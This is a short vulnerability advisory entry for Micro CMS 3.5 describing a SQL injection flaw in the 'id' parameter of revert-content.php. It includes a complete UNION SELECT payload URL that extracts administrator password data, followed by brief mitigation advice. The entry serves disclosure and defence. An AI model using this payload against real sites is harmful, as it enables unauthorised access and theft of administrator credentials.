vendor:
Micro CMS
by:
notsec.com
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Micro CMS
Affected Version From: Micro CMS 3.5
Affected Version To: Micro CMS 3.5
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Micro CMS 3.5 SQL Injection
The Micro CMS 3.5 application is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL code into the 'id' parameter in the 'revert-content.php' file. This allows the attacker to bypass authentication and retrieve sensitive information from the database. The specific exploit for this vulnerability is: 'http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*'.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.